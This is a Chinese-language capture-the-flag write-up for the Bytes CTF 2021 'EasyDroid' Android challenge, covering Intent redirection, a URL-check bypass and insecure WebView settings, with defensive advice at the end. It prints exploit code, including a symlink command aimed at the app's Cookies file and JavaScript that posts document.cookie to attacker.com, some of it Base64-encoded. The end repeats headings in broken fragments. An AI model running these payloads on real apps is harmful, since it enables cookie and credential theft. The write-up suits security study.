Bytes CTF 2021 EasyDroid 漏洞分析与复现<\/h1>

1. 应用概述<\/h2>
EasyDroid 是一个 Android 应用程序，存在多个安全漏洞，主要涉及 WebView 的不安全配置和 Intent 重定向问题。本教学文档将详细分析这些漏洞及其利用方法。<\/p>

2. 应用组件分析<\/h2>

2.1 AndroidManifest.xml 分析<\/h3>

应用包含三个主要组件：<\/p>

MainActivity<\/strong>：导出的活动，存在 Intent 重定向漏洞<\/li>
TestActivity<\/strong>：非导出的活动，包含不安全的 WebView 配置<\/li>

FlagReceiver<\/strong>：广播接收器，将 Flag 保存到本地 Cookie 文件夹<\/li> <\/ol>
2.2 组件详细分析<\/h3>
MainActivity<\/h4>

启动以 toutiao.com<\/code> 结尾的 WebView<\/li>
在 shouldOverrideUrlLoading<\/code> 方法中解析传入的协议<\/li>
如果协议以 Intent<\/code> 开头，就会启动传入的 Intent<\/li>
漏洞点：URL 检查不严格，可通过构造特殊 URL 绕过检测<\/li> <\/ul> 绕过方法<\/strong>：<\/p> http:\/\/toutiao.com@127.0.0.1:8080\/easydroid.html <\/code><\/pre> TestActivity<\/h4> 根据 Intent 传入的 URL 直接启动 WebView<\/li> 不安全配置： setJavaScriptEnabled(true)<\/code>：启用 JavaScript<\/li> setAllowFileAccess(true)<\/code>：默认开启，允许访问本地文件<\/li> <\/ul> <\/li> 配合 MainActivity 的 Intent 重定向，可被恶意应用利用<\/li> <\/ul> FlagReceiver<\/h4> 将获取的 Flag 保存到本地 Cookie 文件夹<\/li> 攻击目标：获取 Cookie 文件中的 Flag<\/li> <\/ul> 3. 漏洞利用思路<\/h2> 3.1 攻击目标<\/h3> 获取应用目录下的 Cookie 文件信息，其中包含 Flag。<\/p> 3.2 攻击步骤<\/h3> 利用 MainActivity 的 URL 检测漏洞<\/strong>：<\/p> 构造特殊 URL 让应用访问恶意网站<\/li> 绕过 toutiao.com<\/code> 检查<\/li> <\/ul> <\/li> XSS 攻击注入<\/strong>：<\/p> 在恶意网站中将 XSS 攻击脚本注入到目标程序的 Cookie 文件中<\/li> 利用 WebView 的 JavaScript 执行能力<\/li> <\/ul> <\/li> 符号链接攻击<\/strong>：<\/p> 在攻击应用中创建符号链接<\/li> 将 .html 文件链接到目标程序的 Cookie 文件<\/li> <\/ul> <\/li> 执行 XSS 脚本<\/strong>：<\/p> 通过恶意网站执行 .html 文件<\/li> XSS 脚本将整个 Cookie 数据泄露<\/li> <\/ul> <\/li> <\/ol> 3.3 技术细节<\/h3> WebView Cookie 存储机制<\/h4> 应用访问网页 20-30 秒后，会保存网页 Cookie 到手机<\/li> 存储路径：\/data\/data\/<package_name>\/app_webview\/Cookies<\/code><\/li> 存储格式：所有网站 Cookie 信息以 key:value<\/code> 方式保存<\/li> <\/ul> XSS 攻击实现<\/h4> 方法一<\/strong>：利用 Image 对象<\/p> new<\/span> Image<\/span>().src<\/span> =<\/span> "http:\/\/attacker.com\/steal?data="<\/span> +<\/span> escape<\/span>(document.cookie<\/span>); <\/span><\/span><\/code><\/pre>方法二<\/strong>：使用 XMLHttpRequest<\/p> var<\/span> xhr<\/span> =<\/span> new<\/span> XMLHttpRequest<\/span>(); <\/span><\/span>xhr<\/span>.open<\/span>("POST"<\/span>, "http:\/\/attacker.com\/steal"<\/span>, true<\/span>); <\/span><\/span>xhr<\/span>.send<\/span>(document.cookie<\/span>); <\/span><\/span><\/code><\/pre>4. 攻击代码实现<\/h2> 4.1 攻击应用代码<\/h3> 启动 MainActivity 并传入恶意 URL：<\/p> Intent intent =<\/span> new<\/span> Intent();<\/span> <\/span><\/span>intent.<\/span>setComponent<\/span>(<\/span>new<\/span> ComponentName(<\/span>"com.bytectf.easydroid"<\/span>,<\/span> <\/span><\/span> "com.bytectf.easydroid.MainActivity"<\/span>));<\/span> <\/span><\/span>intent.<\/span>putExtra<\/span>(<\/span>"url"<\/span>,<\/span> "http:\/\/toutiao.com@127.0.0.1:8080\/easydroid.html"<\/span>);<\/span> <\/span><\/span>startActivity(<\/span>intent);<\/span> <\/span><\/span><\/code><\/pre>4.2 恶意 HTML 文件<\/h3> easydroid.html<\/code> 内容：<\/p> <script<\/span>> <\/span><\/span>\/\/ 第一步：启动存在漏洞的TestActivity <\/span><\/span><\/span><\/span>location<\/span>.href<\/span> =<\/span> "intent:#Intent;component=com.bytectf.easydroid\/.TestActivity;S.url=http:\/\/attacker.com\/malicious;end"<\/span>; <\/span><\/span> <\/span><\/span>\/\/ 第二步：利用符号链接执行XSS攻击 <\/span><\/span><\/span>\/\/ 这里需要配合符号链接将Cookie文件链接到.html文件 <\/span><\/span><\/span><\/span><\/script<\/span>> <\/span><\/span><\/code><\/pre>4.3 符号链接攻击<\/h3> 在攻击应用中创建符号链接：<\/p> \/\/ 创建符号链接，将恶意HTML文件链接到Cookie文件 <\/span><\/span><\/span><\/span>Process process =<\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"ln -s \/data\/data\/com.bytectf.easydroid\/app_webview\/Cookies \/malicious.html"<\/span>);<\/span> <\/span><\/span><\/code><\/pre>4.4 XSS 注入脚本<\/h3> exp.xml<\/code> 内容（Base64 编码的恶意脚本）：<\/p> \/\/ Base64 编码前 <\/span><\/span><\/span><\/span>function<\/span> stealCookie<\/span>() { <\/span><\/span> var<\/span> xhr<\/span> =<\/span> new<\/span> XMLHttpRequest<\/span>(); <\/span><\/span> xhr<\/span>.open<\/span>("POST"<\/span>, "http:\/\/attacker.com\/steal"<\/span>, true<\/span>); <\/span><\/span> xhr<\/span>.send<\/span>(document.cookie<\/span>); <\/span><\/span>} <\/span><\/span>stealCookie<\/span>(); <\/span><\/span> <\/span><\/span>\/\/ Base64 编码后 <\/span><\/span><\/span><\/span>ZnVuY3Rpb24gc3RlYWxDb29raWUoKSB7CiAgICB2YXIgeGhyID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7CiAgICB4aHIub3BlbigiUE9TVCIsICJodHRwOi8vYXR0YWNrZXIuY29tL3N0ZWFsIiwgdHJ1ZSk7CiAgICB4aHIuc2VuZChkb2N1bWVudC5jb29raWUpOwp9CnN0ZWFsQ29va2llKCk7<\/span> <\/span><\/span><\/code><\/pre>通过 eval(atob("BASE64_CODE"))<\/code> 执行解码后的脚本。<\/p> 5. 漏洞总结<\/h2> 5.1 考察点<\/h3> URL 检测不严格，导致可访问恶意网页<\/li> Intent 重定向启动非导出的 TestActivity<\/li> WebView 组件配置不当导致的 XSS 攻击<\/li> 符号链接与文件访问的结合利用<\/li> <\/ol> 5.2 漏洞点<\/h3> MainActivity<\/strong>：<\/p> WebView 未严格检查访问的 URL<\/li> 提供 Intent 重定向接口<\/li> <\/ul> <\/li> TestActivity<\/strong>：<\/p> WebView 同时开启 setAllowFileAccess<\/code> 和 setJavaScriptEnabled<\/code><\/li> 未限制访问的 URL，直接加载传入的 URL<\/li> <\/ul> <\/li> 整体设计<\/strong>：<\/p> 敏感信息（Flag）存储在可被 WebView 访问的位置<\/li> 缺乏适当的沙箱隔离<\/li> <\/ul> <\/li> <\/ol> 6. 防御建议<\/h2> 严格 URL 检查<\/strong>：<\/p> 使用白名单机制验证 URL<\/li> 正确处理 URL 中的特殊字符（如 @）<\/li> <\/ul> <\/li> 安全配置 WebView<\/strong>：<\/p> 除非必要，不要启用 setJavaScriptEnabled<\/code><\/li> 禁用 setAllowFileAccess<\/code> 或限制文件访问范围<\/li> 使用 setAllowFileAccessFromFileURLs(false)<\/code> 和 setAllowUniversalAccessFromFileURLs(false)<\/code><\/li> <\/ul> <\/li> Intent 处理<\/strong>：<\/p> 避免直接启动传入的 Intent<\/li> 对组件调用进行严格验证<\/li> <\/ul> <\/li> 敏感数据存储<\/strong>：<\/p> 不要将敏感信息存储在 WebView 可访问的位置<\/li> 使用加密存储或 Android 的安全存储机制<\/li> <\/ul> <\/li> 输入验证<\/strong>：<\/p> 对所有外部输入进行严格验证<\/li> 实施适当的输出编码防止 XSS<\/li> <\/ul> <\/li> <\/ol> 通过以上措施，可以有效防止此类漏洞被利用。<\/p>

Bytes CTF 2021 EasyDroid 漏洞分析与复现<\/h1>

1. 应用概述<\/h2> EasyDroid 是一个 Android 应用程序，存在多个安全漏洞，主要涉及 WebView 的不安全配置和 Intent 重定向问题。本教学文档将详细分析这些漏洞及其利用方法。<\/p>

2. 应用组件分析<\/h2>

2.2 组件详细分析<\/h3>

3. 漏洞利用思路<\/h2>

3.1 攻击目标<\/h3> 获取应用目录下的 Cookie 文件信息，其中包含 Flag。<\/p>

3.3 技术细节<\/h3>

4. 攻击代码实现<\/h2>

1. 应用概述<\/h2>
EasyDroid 是一个 Android 应用程序，存在多个安全漏洞，主要涉及 WebView 的不安全配置和 Intent 重定向问题。本教学文档将详细分析这些漏洞及其利用方法。<\/p>

3.1 攻击目标<\/h3>
获取应用目录下的 Cookie 文件信息，其中包含 Flag。<\/p>